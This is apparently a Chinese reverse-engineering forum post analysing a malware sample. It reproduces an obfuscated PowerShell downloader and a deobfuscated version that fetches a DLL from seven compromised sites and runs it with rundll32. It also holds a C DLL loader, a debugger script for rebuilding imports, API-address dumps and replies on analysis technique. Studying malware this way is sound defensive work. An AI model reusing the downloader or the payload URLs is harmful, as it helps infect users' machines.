AGwAMwAyACcAKQAgACQAVABwAGQAdQBlADMAMgAsACcAIwAxACcALgAiAFQAYABPAFMAdABSAGkAYABOAGcAIgAoACkAOwAkAEgAMABfADQAYgB3ADMAPQAoACgAJwBTACcAKwAnAGQAdgBxACcAKQArACgAJwB3ACcAKwAnADYAOQAnACkAKQA7AGIAcgBlAGEAawA7ACQAVwB5AHEAMQAzAG8AcwA9ACgAJwBTADgAJwArACcAZgB5ACcAKwAoACcAOAB4ACcAKwAnADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAdQBhAHgAbwBmADkAPQAoACcAUwBlACcAKwAoACcAZAAnACsAJwA5ADAAJwApACsAJwBfAHoAJwApAA==
$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s2'+')'+(('(@ht'+'t'+'ps:q'+'q)'+'(s2'))+((')('+'qq)('))+(('s2)'+'(x'))+('uan'+'thin')+('hs'+'hop')+('.'+'com')+(('qq'+')(s'+'2)('))+('ac'+'ura-')+'md'+'x'+('-snc'+'k')+(('0q'+'q)('))+(('s2)(2L'+'U7'+'w'+'qq)('+'s2)(@'+'ht'+'t'+'ps:'))+'q'+(('q)(s'+'2)(qq)'+'(s'))+(('2)'))+(('(c'))+('a'+'llto')+'re'+'p'+(('air'+'.c'+'omqq)(s'+'2)(a'))+(('ss'+'e'+'tsqq)'+'(s2'))+((')'+'(09'))+('erZ'+'FF')+'qq'+((')(s'+'2'))+((')('+'@h'))+('tt'+'p')+((':'+'qq'+')(s2)'+'(qq)'+'(s2)(se'))+('r'+'vicio'+'s')+'.'+('s'+'em')+('per'+'ti.'+'com')+(('q'+'q)'))+('(s2'+')')+(('(w'))+(('p-'+'adminqq)'+'(s2'+')('+'2'))+(('I'+'y'+'ZE7kqq'+')('))+(('s'+'2)(@'))+('ht'+'t')+('ps:'+'qq')+((')'+'(s2'))+')'+(('(q'))+(('q)(s'+'2)'+'(gia'))+('tot'+'365')+'.'+('com'+'q')+(('q)(s2'+')'))+('('+'w'+'p-conten'+'t'+'qq)(s2)')+(('(u'+'p'))+'lo'+'a'+(('d'+'sqq)('))+(('s2'+')(2'+'0'))+('20'+'qq')+((')(s'+'2'))+((')(Sx'+'qq'+')(s2)('))))."REPl`A`cE"((((('qq'+')'))+'('+(('s2'+')(')))),([array]('/'),('hw'+'e'))[0])."sPL`it"($L_hxsiu + $Pii8oen + $Ow4xjha);$N8fhtx6=(('N'+'949')+'lw'+'n');foreach ($Pgsjh8n in $Ny4mnvx | S`OrT-ob`jecT {G`ET-`RAnDom}){try{$Z1fmvqh."doWN`loAd`FiLe"($Pgsjh8n, $Tpdue32);$Z5rj4au=('Ho'+('_06y'+'i'));If ((.('Get-'+'It'+'em') $Tpdue32)."len`g`TH" -ge 30704) {&('ru'+'nd'+'ll32') $Tpdue32,'#1'."T`OStRi`Ng"();$H0_4bw3=(('S'+'dvq')+('w'+'69'));break;$Wyq13os=('S8'+'fy'+('8x'+'6'))}}catch{}}$Tuaxof9=('Se'+('d'+'90')+'_z')
$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo'); set-ITEM ("variaBle"+":l6U"+"YH"+"N") ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); ( iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}') -F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d')); (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s2'+')'+(('(@ht'+'t'+'ps:q'+'q)'+'(s2'))+((')('+'qq)('))+(('s2)'+'(x'))+('uan'+'thin')+('hs'+'hop')+('.'+'com')+(('qq'+')(s'+'2)('))+('ac'+'ura-')+'md'+'x'+('-snc'+'k')+(('0q'+'q)('))+(('s2)(2L'+'U7'+'w'+'qq)('+'s2)(@'+'ht'+'t'+'ps:'))+'q'+(('q)(s'+'2)(qq)'+'(s'))+(('2)'))+(('(c'))+('a'+'llto')+'re'+'p'+(('air'+'.c'+'omqq)(s'+'2)(a'))+(('ss'+'e'+'tsqq)'+'(s2'))+((')'+'(09'))+('erZ'+'FF')+'qq'+((')(s'+'2'))+((')('+'@h'))+('tt'+'p')+((':'+'qq'+')(s2)'+'(qq)'+'(s2)(se'))+('r'+'vicio'+'s')+'.'+('s'+'em')+('per'+'ti.'+'com')+(('q'+'q)'))+('(s2'+')')+(('(w'))+(('p-'+'adminqq)'+'(s2'+')('+'2'))+(('I'+'y'+'ZE7kqq'+')('))+(('s'+'2)(@'))+('ht'+'t')+('ps:'+'qq')+((')'+'(s2'))+')'+(('(q'))+(('q)(s'+'2)'+'(gia'))+('tot'+'365')+'.'+('com'+'q')+(('q)(s2'+')'))+('('+'w'+'p-conten'+'t'+'qq)(s2)')+(('(u'+'p'))+'lo'+'a'+(('d'+'sqq)('))+(('s2'+')(2'+'0'))+('20'+'qq')+((')(s'+'2'))+((')(Sx'+'qq'+')(s2)('))))."REPl`A`cE"((((('qq'+')'))+'('+(('s2'+')(')))),([array]('/'),('hw'+'e'))[0])."sPL`it"($L_hxsiu + $Pii8oen + $Ow4xjha);$N8fhtx6=(('N'+'949')+'lw'+'n');foreach ($Pgsjh8n in $Ny4mnvx | S`OrT-ob`jecT {G`ET-`RAnDom}){try{$Z1fmvqh."doWN`loAd`FiLe"($Pgsjh8n, $Tpdue32);$Z5rj4au=('Ho'+('_06y'+'i'));If ((.('Get-'+'It'+'em') $Tpdue32)."len`g`TH" -ge 30704) {&('ru'+'nd'+'ll32') $Tpdue32,'#1'."T`OStRi`Ng"();$H0_4bw3=(('S'+'dvq')+('w'+'69'));break;$Wyq13os=('S8'+'fy'+('8x'+'6'))}}catch{}}$Tuaxof9=('Se'+('d'+'90')+'_z')
$cVNgAS=System.IO.Directory;
set-item(variaBle:l6UYHN)System.Net.ServicePointManager;
$Xdz_t_i=Auz0zqx;
$Pii8oen=$B0xk04r + @ + $Val6qax;
$Lr_lqnw=Pk915wo;
(item variable:cvngas).value::"createdirectory"($home + "\y559jsv\iewfmy3\");
$M_dnbs4=Qugsyod;
(Get-iTem (variable:l6uyhn)).value::"securityprotocol" = tls12;
$X2thqmg=Jzzz62m;
$Qocy_bg=Jzzz62m;
$Zy7z7hd=Fg04ccg;
$E5pam4e=Wi08jay;
$Tpdue32=$HOME+(MRPY559jsvMRPIewfmy3MRP."RePLaCE"(('MRP'),'\'))+$Qocy_bg+('.dll');
$R6utvyl=Gprs79j;
$Z1fmvqh=System.Net.WebClient;
$Ny4mnvx=
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
;$N8fhtx6=N949lwn;
foreach ($Pgsjh8n in $Ny4mnvx | SOrT-objecT {GET-RAnDom})
{ try
{
$Z1fmvqh."doWNloAdFiLe"($Pgsjh8n, $Tpdue32);
$Z5rj4au=Ho_06yi;
If ((.('Get-Item') $Tpdue32)."lengTH" -ge 30704)
{
&('rundll32') $Tpdue32,'#1'."TOStRiNg"();
$H0_4bw3=Sdvqw69;
break;
$Wyq13os=S8fy8x6
}
}catch{}
}$Tuaxof9=Sed90_z
$cVNgAS=System.IO.Directory;
set-item(variaBle:l6UYHN)System.Net.ServicePointManager;
$Xdz_t_i=Auz0zqx;
$Pii8oen=$B0xk04r + @ + $Val6qax;
$Lr_lqnw=Pk915wo;
(item variable:cvngas).value::"createdirectory"($home + "\y559jsv\iewfmy3\");
$M_dnbs4=Qugsyod;
(Get-iTem (variable:l6uyhn)).value::"securityprotocol" = tls12;
$X2thqmg=Jzzz62m;
$Qocy_bg=Jzzz62m;
$Zy7z7hd=Fg04ccg;
$E5pam4e=Wi08jay;
$Tpdue32=$HOME+(MRPY559jsvMRPIewfmy3MRP."RePLaCE"(('MRP'),'\'))+$Qocy_bg+('.dll');
$R6utvyl=Gprs79j;
$Z1fmvqh=System.Net.WebClient;
$Ny4mnvx=
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
;$N8fhtx6=N949lwn;
foreach ($Pgsjh8n in $Ny4mnvx | SOrT-objecT {GET-RAnDom})
{ try
{
$Z1fmvqh."doWNloAdFiLe"($Pgsjh8n, $Tpdue32);
$Z5rj4au=Ho_06yi;
If ((.('Get-Item') $Tpdue32)."lengTH" -ge 30704)
{
&('rundll32') $Tpdue32,'#1'."TOStRiNg"();
$H0_4bw3=Sdvqw69;
break;
$Wyq13os=S8fy8x6
}
}catch{}
}$Tuaxof9=Sed90_z
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
#include <iostream>#include<windows.h>typedef int(WINAPI* fnRunDLL)();
MyRunDLL My_RunDLL;int main()
{ HMODULE hModule = LoadLibraryA("C:\\Users\\libaobao\\Y559jsv\\Iewfmy3\\Ppnq9j.dll");
My_RunDLL = (MyRunDLL)GetProcAddress(hModule, "RunDLL");
My_RunDLL();
return 0;
}#include <iostream>#include<windows.h>typedef int(WINAPI* fnRunDLL)();
MyRunDLL My_RunDLL;int main()
{ HMODULE hModule = LoadLibraryA("C:\\Users\\libaobao\\Y559jsv\\Iewfmy3\\Ppnq9j.dll");
My_RunDLL = (MyRunDLL)GetProcAddress(hModule, "RunDLL");
My_RunDLL();
return 0;
}// 1. 初始化变量
MOV dwGetAPIAddr, 00156135 // 1. 获取API地址的地方
MOV dwWriteAPIAddr, 01236000 // 2. 填充IAT的地方
MOV dwBreakPoint,0015B0D4 // 3. BreakPoint
// 2. 初始化环境,清除所有断点,设置必要断点
BC // 清除所有软件断点
BPHWC // 清除硬件断点
BPMC // 清除内存断点
BPHWS dwGetAPIAddr, "x" //当执行到此地址时产生中断.
BPHWS dwBreakPoint, "x" //当执行到此地址时产生中断.
// 3. 构建循环,处理每一个分支
LOOP0:RUN // F9
CMP dwGetAPIAddr,eip
JNZ case1MOV [dwWriteAPIAddr],eaxADD dwWriteAPIAddr,4
JMP LOOP0case1:CMP dwBreakPoint,eip
JNZ LOOP0MSG "到达!"
// 1. 初始化变量
MOV dwGetAPIAddr, 00156135 // 1. 获取API地址的地方
MOV dwWriteAPIAddr, 01236000 // 2. 填充IAT的地方
MOV dwBreakPoint,0015B0D4 // 3. BreakPoint
// 2. 初始化环境,清除所有断点,设置必要断点
BC // 清除所有软件断点
BPHWC // 清除硬件断点
BPMC // 清除内存断点
BPHWS dwGetAPIAddr, "x" //当执行到此地址时产生中断.
BPHWS dwBreakPoint, "x" //当执行到此地址时产生中断.
// 3. 构建循环,处理每一个分支
LOOP0:RUN // F9
CMP dwGetAPIAddr,eip
JNZ case1MOV [dwWriteAPIAddr],eaxADD dwWriteAPIAddr,4
JMP LOOP0case1:CMP dwBreakPoint,eip
JNZ LOOP0MSG "到达!"
76EB1280 kernel32.GetProcessHeap
76EACF41 kernel32.GetModuleHandleA
77B22DD6 ntdll.RtlAllocateHeap
76EB3C01 kernel32.LoadLibraryW
76EABBD0 kernel32.HeapFree
775DCA64 advapi32.OpenSCManagerW
775E369C advapi32.CloseServiceHandle
761C5708 shell32.SHGetFolderPathW
76EB3C26 kernel32.GetModuleFileNameW
76EAD9E8 kernel32.lstrlenW
76E98BFA kernel32.lstrcpyW
76EB679E kernel32.GetCommandLineW
76159EE8 shell32.CommandLineToArgvW
76EACA64 kernel32.LocalFree
76EACC56 kernel32.CreateFileW
76EA38AD kernel32.GetFileInformationByHandleEx
76EACA7C kernel32.CloseHandle
76EB2FDE kernel32.GetSystemTimeAsFileTime
76E9F731 kernel32.CreateToolhelp32Snapshot
76E9FA35 kernel32.Process32FirstW
76EACAC4 kernel32.GetCurrentProcessId
76E9FACA kernel32.Process32NextW
76EA59D7 kernel32.OpenProcess
76EA5C28 kernel32.QueryFullProcessImageNameW
7790BB71 shlwapi.PathFindFileNameW
76EB3386 kernel32.CreateEventW
76EB375D kernel32.CreateThread
76E9EB4E kernel32.GetTickCount64
76EABA60 kernel32.GetTickCount
76EABA90 kernel32.WaitForSingleObject
76EB1280 kernel32.GetProcessHeap
76EACF41 kernel32.GetModuleHandleA
77B22DD6 ntdll.RtlAllocateHeap
76EB3C01 kernel32.LoadLibraryW
76EABBD0 kernel32.HeapFree
775DCA64 advapi32.OpenSCManagerW
775E369C advapi32.CloseServiceHandle
761C5708 shell32.SHGetFolderPathW
76EB3C26 kernel32.GetModuleFileNameW
76EAD9E8 kernel32.lstrlenW
76E98BFA kernel32.lstrcpyW
76EB679E kernel32.GetCommandLineW
76159EE8 shell32.CommandLineToArgvW
76EACA64 kernel32.LocalFree
76EACC56 kernel32.CreateFileW
76EA38AD kernel32.GetFileInformationByHandleEx
76EACA7C kernel32.CloseHandle
76EB2FDE kernel32.GetSystemTimeAsFileTime
76E9F731 kernel32.CreateToolhelp32Snapshot
76E9FA35 kernel32.Process32FirstW
76EACAC4 kernel32.GetCurrentProcessId
76E9FACA kernel32.Process32NextW
76EA59D7 kernel32.OpenProcess
76EA5C28 kernel32.QueryFullProcessImageNameW
7790BB71 shlwapi.PathFindFileNameW
76EB3386 kernel32.CreateEventW
76EB375D kernel32.CreateThread
76E9EB4E kernel32.GetTickCount64
76EABA60 kernel32.GetTickCount
76EABA90 kernel32.WaitForSingleObject
76EB1280 kernel32.GetProcessHeap
76EACF41 kernel32.GetModuleHandleA
77B22DD6 ntdll.RtlAllocateHeap
76EB3C01 kernel32.LoadLibraryW
76EABBD0 kernel32.HeapFree
775DCA64 advapi32.OpenSCManagerW
775E369C advapi32.CloseServiceHandle
761C5708 shell32.SHGetFolderPathW
76EB3C26 kernel32.GetModuleFileNameW
76EAD9E8 kernel32.lstrlenW
76E98BFA kernel32.lstrcpyW
76EB679E kernel32.GetCommandLineW
76159EE8 shell32.CommandLineToArgvW
76EACA64 kernel32.LocalFree
76EACC56 kernel32.CreateFileW
76EA38AD kernel32.GetFileInformationByHandleEx
76EACA7C kernel32.CloseHandle
76EB2FDE kernel32.GetSystemTimeAsFileTime
76E9F731 kernel32.CreateToolhelp32Snapshot
76E9FA35 kernel32.Process32FirstW
76EACAC4 kernel32.GetCurrentProcessId
76E9FACA kernel32.Process32NextW
76EA59D7 kernel32.OpenProcess
76EA5C28 kernel32.QueryFullProcessImageNameW
7790BB71 shlwapi.PathFindFileNameW
76EB3386 kernel32.CreateEventW
76EB375D kernel32.CreateThread
76E9EB4E kernel32.GetTickCount64
76EABA60 kernel32.GetTickCount
775DDF14 advapi32.CryptAcquireContextW
75DDD718 crypt32.CryptDecodeObjectEx
775DC532 advapi32.CryptImportKey
775D8EE9 advapi32.CryptGenKey
775DDF4E advapi32.CryptCreateHash
76E96BA9 kernel32.GetComputerNameA
76EA04B6 kernel32.GetWindowsDirectoryW
76EB7598 kernel32.GetVolumeInformationW
77B99A60 ntdll._snprintf
76EAA611 kernel32.lstrlenA
77B365E3 ntdll.RtlGetVersion
76E9BE77 kernel32.GetNativeSystemInfo
76EAB744 kernel32.ProcessIdToSessionId
76EB450E kernel32.WideCharToMultiByte
77B04CC0 ntdll.memcpy
77613198 advapi32.CryptDuplicateHash
775F779B advapi32.CryptEncrypt
775D91EA advapi32.CryptExportKey
775DDF7E advapi32.CryptGetHashParam
775DDF66 advapi32.CryptDestroyHash
77B03CD6 ntdll._snwprintf
77B3283D ntdll.RtlRandomEx
75F61D76 urlmon.ObtainUserAgentString
76EB452B kernel32.MultiByteToWideChar
77979197 wininet.InternetOpenW
7797492C wininet.InternetConnectW
77974A42 wininet.HttpOpenRequestW
77967741 wininet.InternetSetOptionW
7797BA12 wininet.HttpSendRequestW
7796AB49 wininet.InternetCloseHandle
77975C75 wininet.HttpQueryInfoW
7796B406 wininet.InternetReadFile
77613178 advapi32.CryptDecrypt
775DC54A advapi32.CryptVerifySignatureW
76EB53B2 kernel32.FindFirstFileW
756A1856 kernel32.VirtualAlloc
756A34D5 kernel32.CreateThread
76EB1280 kernel32.GetProcessHeap
76EACF41 kernel32.GetModuleHandleA
77B22DD6 ntdll.RtlAllocateHeap
76EB3C01 kernel32.LoadLibraryW
76EABBD0 kernel32.HeapFree
775DCA64 advapi32.OpenSCManagerW
775E369C advapi32.CloseServiceHandle
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2021-1-5 19:08
被baobao雅编辑
,原因: 上传样本
|
|
|---|---|
|
|
|
|
|
|
|
|
大佬您好,我想最近也拿到一个样本,和你的是一个家族。我想知道是怎么找到那个没有导入表的内存dll,填充IAT的地方的。就是标题3.4 观察API那里。
|
|
|
在GetProcAddress 下断,然后回溯分析,静态看哪些函数调用次数比较多并且是传参有类似hash的函数,大概就是你想找的函数了 |
